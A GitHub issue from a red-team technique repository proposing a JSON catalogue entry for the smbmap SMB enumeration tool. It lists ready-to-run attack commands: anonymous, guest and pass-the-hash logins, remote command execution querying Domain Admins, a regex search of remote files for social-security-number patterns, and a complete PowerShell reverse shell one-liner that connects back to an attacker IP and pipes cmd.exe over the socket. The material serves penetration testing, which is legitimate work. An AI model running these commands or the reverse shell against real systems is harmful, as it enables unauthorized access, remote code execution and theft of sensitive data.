
Public repository for the techniques and tools shown on rtt.secdu.de
GNU Affero General Public License v3.0

New tool: smbmap #81

Closed Patrick-DE closed 1 year ago

Patrick-DE commented 1 year ago
{
  "name": "smbmap",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://github.com/ShawnDEvans/smbmap",
  "description": "SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Guest Access (SMB)]]\n* `smbmap -u \"\" -p \"\" -P 445 -H <dc-ip>`\n* `smbmap -u \"guest\" -p \"\" -P 445 -H <dc-ip>`\n\n\n",
  "commands": [
    {
      "id": "f6451a5f-08ea-4bc7-a018-f9bc38fbf921",
      "name": "SMB anonymous login",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "smbmap -u \"\" -p \"\" -P 445 -H <ip>",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "7305314c-e31c-42f1-af86-c4d13e06c0e8",
      "name": "SMB guest login",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "smbmap -u \"guest\" -p \"\" -P 445 -H <ip>",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "338a4da8-b77c-4e08-ba5b-e11383d25df7",
      "name": "Help",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Main arguments:\n  -H HOST               IP of host\n  --host-file FILE      File containing a list of hosts\n  -u USERNAME           Username, if omitted null session assumed\n  -p PASSWORD           Password or NTLM hash\n  --prompt              Prompt for a password\n  -s SHARE              Specify a share (default C$), ex 'C$'\n  -d DOMAIN             Domain name (default WORKGROUP)\n  -P PORT               SMB port (default 445)\n  -v                    Return the OS version of the remote host\n  --admin               Just report if the user is an admin\n  --no-banner           Removes the banner from the top of the output\n  --no-color            Removes color from output\n  --no-update           Removes \"Working on it...\" update message from output\n\nCommand Execution:\n  Options for executing commands on the specified host\n\n  -x COMMAND            Execute a command ex. 'ipconfig /all'\n  --mode CMDMODE        Set the execution method, wmi or psexec, default wmi\n\nShard drive Search:\n  Options for searching/enumerating the share of the specified host(s)\n\n  -L                    List all drives on the specified host, requires ADMIN\n                        rights.\n  -R [PATH]             Recursively list dirs, and files (no share\\path lists\n                        ALL shares), ex. 'C$\\Finance'\n  -r [PATH]             List contents of directory, default is to list root of\n                        all shares, ex. -r 'C$\\Documents and\n                        Settings\\Administrator\\Documents'\n  -A PATTERN            Define a file name pattern (regex) that auto downloads\n                        a file on a match (requires -R or -r), not case\n                        sensitive, ex '(web|global).(asax|config)'\n  -g FILE               Output to a file in a grep friendly format, used with\n                        -r or -R (otherwise it outputs nothing), ex -g\n                        grep_out.txt\n  --csv FILE            Output to a CSV file, ex --csv shares.csv\n  --dir-only            List only directories, ommit files.\n  --no-write-check      Skip check to see if drive grants WRITE access.\n  -q                    Quiet verbose output. Only shows shares you have READ\n                        or WRITE on, and suppresses file listing when\n                        performing a search (-A).\n  --depth DEPTH         Traverse a directory tree to a specific depth. Default\n                        is 5.\n  --exclude SHARE [SHARE ...]\n                        Exclude share(s) from searching and listing, ex.\n                        --exclude ADMIN$ C$'\n\nFile Content Search:\n  Options for searching the content of files (must run as root), kind of experimental\n\n  -F PATTERN            File content search, -F '[Pp]assword' (requires admin\n                        access to execute commands, and PowerShell on victim\n                        host)\n  --search-path PATH    Specify drive/path to search (used with -F, default\n                        C:\\Users), ex 'D:\\HR\\'\n  --search-timeout TIMEOUT\n                        Specifcy a timeout (in seconds) before the file search\n                        job gets killed. Default is 300 seconds.\n\nFilesystem interaction:\n  Options for interacting with the specified host's filesystem\n\n  --download PATH       Download a file from the remote system,\n                        ex.'C$\\temp\\passwords.txt'\n  --upload SRC DST      Upload a file to the remote system ex.\n                        '/tmp/payload.exe C$\\temp\\payload.exe'\n  --delete PATH TO FILE\n                        Delete a remote file, ex. 'C$\\temp\\msf.exe'\n  --skip                Skip delete file confirmation prompt",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "d8562afa-f263-41df-a14d-c5c2658c8aff",
      "name": "SMB login with hash",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "3333793b-2086-4f3b-abc1-6f1d82c71dee",
      "name": "SMB command exec",
      "description": "",
      "tag": "",
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group \"Domain Admins\" /domain' -H 192.168.2.50",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "dc866f27-609b-47cc-8ea8-9642e71a0f25",
      "name": "SMB login",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "smbmap.py -H 192.168.12.123 -u administrator -p asdf1234",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "f1218659-f058-4d69-8c44-23a6248fad82",
      "name": "Non recursive path listing (ls)",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\\Users'",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "b4c2ff7c-d57a-4e5b-bea5-bbd17cc18e17",
      "name": "File Content Search",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "6ebdf996-1109-46b2-a4b2-5f50523d2242",
      "name": "Get drives",
      "description": "",
      "tag": "",
      "results": [
        "COMPUTER:DRIVES"
      ],
      "cmd": "smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    },
    {
      "id": "349d8da8-632a-4060-bb81-2814f0c3db0b",
      "name": "Get Shell (PS)",
      "description": "Run PowerShell script on the victim SMB host (change the IP in the code to your IP address, i.e. the address the shell connects back to)",
      "tag": "",
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command \"function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=\"\"\"\"192.168.0.153\"\"\"\"; $port=\"\"\"\"4445\"\"\"\";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=\"\"\"\"cmd.exe\"\"\"\"  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out=\"\"\"\" \"\"\"\"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};\"'",
      "requirements": {
        "tag": "SERVICE:SMB"
      }
    }
  ]
}